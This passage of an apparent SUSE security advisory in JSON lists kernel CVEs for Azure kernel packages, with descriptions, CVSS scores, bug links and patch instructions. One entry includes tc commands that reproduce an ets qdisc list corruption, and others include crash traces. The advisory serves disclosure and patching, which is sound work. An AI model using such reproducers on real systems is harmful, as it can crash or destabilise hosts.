"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "low"
}
],
"title": "CVE-2025-68802"
},
{
"cve": "CVE-2025-68803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68803"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68803",
"url": "https://www.suse.com/security/cve/CVE-2025-68803"
},
{
"category": "external",
"summary": "SUSE Bug 1256770 for CVE-2025-68803",
"url": "https://bugzilla.suse.com/1256770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68804"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68804",
"url": "https://www.suse.com/security/cve/CVE-2025-68804"
},
{
"category": "external",
"summary": "SUSE Bug 1256617 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "external",
"summary": "SUSE Bug 1256618 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68808",
"url": "https://www.suse.com/security/cve/CVE-2025-68808"
},
{
"category": "external",
"summary": "SUSE Bug 1256682 for CVE-2025-68808",
"url": "https://bugzilla.suse.com/1256682"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68814",
"url": "https://www.suse.com/security/cve/CVE-2025-68814"
},
{
"category": "external",
"summary": "SUSE Bug 1256651 for CVE-2025-68814",
"url": "https://bugzilla.suse.com/1256651"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68815",
"url": "https://www.suse.com/security/cve/CVE-2025-68815"
},
{
"category": "external",
"summary": "SUSE Bug 1256680 for CVE-2025-68815",
"url": "https://bugzilla.suse.com/1256680"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
